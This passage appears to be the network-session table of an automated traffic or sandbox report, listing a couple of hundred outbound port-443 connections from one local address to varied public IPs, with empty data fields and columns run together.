                                              12650192.168.2.144903261.143.133.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12651192.168.2.1435988138.223.31.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12652192.168.2.144357084.25.71.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12653192.168.2.1443336192.20.185.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12654192.168.2.1436094134.222.220.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12655192.168.2.1460730192.37.36.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12656192.168.2.1452984208.92.205.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12657192.168.2.144359076.126.134.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12658192.168.2.1454512184.85.171.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12659192.168.2.145187065.244.249.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12660192.168.2.1436790193.224.210.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12661192.168.2.144147086.74.247.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12662192.168.2.145173242.30.51.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12663192.168.2.145771699.29.228.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12664192.168.2.144475434.26.253.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12665192.168.2.146084660.47.128.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12666192.168.2.143411214.241.248.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12667192.168.2.1460734188.165.157.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12668192.168.2.145670684.129.180.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12669192.168.2.1433686207.161.243.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12670192.168.2.1441368107.61.140.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12671192.168.2.143557495.135.107.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12672192.168.2.145947677.37.56.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12673192.168.2.145772412.215.87.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12674192.168.2.1444574186.141.42.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12675192.168.2.143986472.224.148.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12676192.168.2.144012050.228.89.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12677192.168.2.1448682149.124.28.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12678192.168.2.1450602121.224.212.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12679192.168.2.1442002140.48.39.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12680192.168.2.1449346129.178.187.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12681192.168.2.1438682134.233.206.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12682192.168.2.1432932167.59.40.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12683192.168.2.1440318162.255.46.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12684192.168.2.1438024131.19.84.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12685192.168.2.144043439.206.28.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12686192.168.2.144272236.65.141.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12687192.168.2.1446762220.21.253.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12688192.168.2.1457342217.73.171.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12689192.168.2.145480260.90.84.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12690192.168.2.144598263.219.214.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12691192.168.2.143488034.189.32.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12692192.168.2.1444556194.110.165.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12693192.168.2.1440470159.9.224.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12694192.168.2.1452900198.181.248.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12695192.168.2.1437442204.29.157.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12696192.168.2.144587636.75.172.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12697192.168.2.145775050.16.233.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12698192.168.2.144997032.167.186.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12699192.168.2.1449774186.63.63.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12700192.168.2.144637825.221.198.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12701192.168.2.1435740169.181.145.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12702192.168.2.143741275.60.243.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12703192.168.2.1439336101.68.84.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12704192.168.2.145818649.22.68.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12705192.168.2.1451014185.5.197.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12706192.168.2.1441252171.215.217.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12707192.168.2.1445908140.245.76.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12708192.168.2.143304479.7.23.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12709192.168.2.143314058.92.205.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12710192.168.2.1453450125.251.23.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12711192.168.2.145202097.56.19.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12712192.168.2.1437514192.199.162.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12713192.168.2.145497299.123.59.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12714192.168.2.145640865.190.145.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12715192.168.2.1435598113.27.141.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12716192.168.2.1456440188.75.72.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12717192.168.2.143294467.64.144.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12718192.168.2.1440660152.105.3.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12719192.168.2.145761832.83.5.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12720192.168.2.1453250164.204.12.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12721192.168.2.1452546202.102.97.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12722192.168.2.1433856126.88.168.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12723192.168.2.1433406189.215.172.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12724192.168.2.1453950112.65.216.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12725192.168.2.1437408143.234.10.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12726192.168.2.1437368140.184.61.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12727192.168.2.1437140121.216.168.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12728192.168.2.1458006184.157.112.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12729192.168.2.1447758132.22.194.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12730192.168.2.144631041.173.206.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12731192.168.2.146079690.6.252.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12732192.168.2.144097463.124.172.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12733192.168.2.1432914162.44.73.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12734192.168.2.1439534177.255.84.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12735192.168.2.1455474191.249.117.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12736192.168.2.143430424.171.5.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12737192.168.2.143428614.122.198.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12738192.168.2.144539695.208.115.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12739192.168.2.1437846137.35.247.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12740192.168.2.145208662.180.246.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12741192.168.2.1438972106.210.36.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12742192.168.2.1459862203.200.241.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12743192.168.2.1453366161.155.31.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12744192.168.2.1436070135.204.109.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12745192.168.2.143785675.0.223.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12746192.168.2.145961293.231.107.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12747192.168.2.144999874.244.216.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12748192.168.2.143784286.35.131.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12749192.168.2.144635844.124.87.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12750192.168.2.1449526217.85.214.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12751192.168.2.144341671.25.227.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12752192.168.2.1452114190.100.159.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12753192.168.2.1433648175.194.10.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12754192.168.2.143586892.255.204.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12755192.168.2.145049269.234.171.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12756192.168.2.145424267.63.150.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12757192.168.2.14606385.88.49.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12758192.168.2.1433912156.123.44.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12759192.168.2.1457776154.210.10.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12760192.168.2.144917461.215.183.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12761192.168.2.143562067.248.202.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12762192.168.2.1453382217.184.156.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12763192.168.2.145262680.97.98.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12764192.168.2.1447344146.179.235.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12765192.168.2.144285424.141.30.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12766192.168.2.144709692.134.161.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12767192.168.2.144523836.111.202.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12768192.168.2.145858043.150.41.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12769192.168.2.143892475.50.172.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12770192.168.2.1458340165.203.191.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12771192.168.2.1446820178.197.223.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12772192.168.2.1440506155.231.116.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12773192.168.2.1440246129.163.230.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12774192.168.2.145644620.101.41.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12775192.168.2.1455928161.27.149.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12776192.168.2.144706862.72.31.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12777192.168.2.1457512125.21.33.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12778192.168.2.1437230157.217.1.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12779192.168.2.143405663.205.0.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12780192.168.2.1441572208.139.153.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12781192.168.2.144239023.216.215.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12782192.168.2.1451446136.196.167.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12783192.168.2.1435972203.225.36.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12784192.168.2.1446700138.10.153.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12785192.168.2.1437572101.123.111.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12786192.168.2.145910237.217.209.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12787192.168.2.1457524222.64.45.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12788192.168.2.1443626161.223.229.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12789192.168.2.1454346171.203.245.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12790192.168.2.143316464.151.200.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12791192.168.2.146046020.228.12.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12792192.168.2.1437718117.133.141.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12793192.168.2.1450398223.106.194.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12794192.168.2.1433194118.24.86.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12795192.168.2.1435834183.34.198.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12796192.168.2.1435268191.255.177.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12797192.168.2.143851814.1.51.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12798192.168.2.144907878.173.227.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12799192.168.2.1439880100.160.144.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12800192.168.2.1454968160.30.112.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12801192.168.2.143403661.169.112.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12802192.168.2.145121637.167.219.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12803192.168.2.144242225.200.58.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12804192.168.2.143940278.163.64.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12805192.168.2.1451534177.139.29.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12806192.168.2.143410074.3.216.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12807192.168.2.144039474.55.68.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12808192.168.2.1460786136.219.46.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12809192.168.2.1454708217.110.245.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12810192.168.2.1446652144.242.136.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12811192.168.2.143790686.229.75.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12812192.168.2.1453414190.79.107.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12813192.168.2.1452320188.54.13.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12814192.168.2.144558877.231.194.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12815192.168.2.1446248162.0.159.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12816192.168.2.1437784158.126.113.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12817192.168.2.1442148171.60.83.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12818192.168.2.1435672135.10.74.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12819192.168.2.1452308185.185.11.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12820192.168.2.1436316155.72.82.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12821192.168.2.1438208200.53.51.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12822192.168.2.1434910113.90.215.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12823192.168.2.1437984200.47.33.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12824192.168.2.146088843.115.187.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12825192.168.2.145715031.246.131.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12826192.168.2.1458830196.21.6.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12827192.168.2.1444238135.254.251.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12828192.168.2.143419446.135.80.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12829192.168.2.144649678.98.165.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12830192.168.2.143872414.207.34.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12831192.168.2.1434962170.219.246.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12832192.168.2.1433238113.48.1.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12833192.168.2.145021019.125.49.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12834192.168.2.145891240.40.192.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12835192.168.2.144543835.2.106.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12836192.168.2.1452262219.11.231.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12837192.168.2.1459624120.185.88.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12838192.168.2.144476089.196.187.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12839192.168.2.14440341.228.143.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12840192.168.2.144133872.61.215.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12841192.168.2.143916012.170.127.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12842192.168.2.1452976204.220.219.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12843192.168.2.145507859.190.169.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12844192.168.2.1437850206.53.108.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12845192.168.2.145230223.48.168.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12846192.168.2.1446102126.139.241.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12847192.168.2.1442890158.50.9.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12848192.168.2.145548054.2.178.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12849192.168.2.1452056181.151.192.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12850192.168.2.144707237.40.135.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12851192.168.2.144673439.204.225.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12852192.168.2.1453080190.41.81.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12853192.168.2.14522102.59.82.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12854192.168.2.1458994139.104.233.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12855192.168.2.1447720102.99.227.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12856192.168.2.1434802101.170.115.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12857192.168.2.1442108174.1.214.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12858192.168.2.143852417.72.216.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12859192.168.2.1459556157.90.113.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12860192.168.2.144834051.110.30.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12861192.168.2.144600675.143.99.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12862192.168.2.144908057.124.165.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12863192.168.2.1443890150.221.111.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12864192.168.2.1450004218.142.219.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12865192.168.2.1437820182.82.182.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12866192.168.2.145478269.80.198.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12867192.168.2.1456862207.81.250.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12868192.168.2.1439410114.140.42.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12869192.168.2.145135696.201.21.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12870192.168.2.144362424.42.248.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12871192.168.2.1442532180.117.50.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
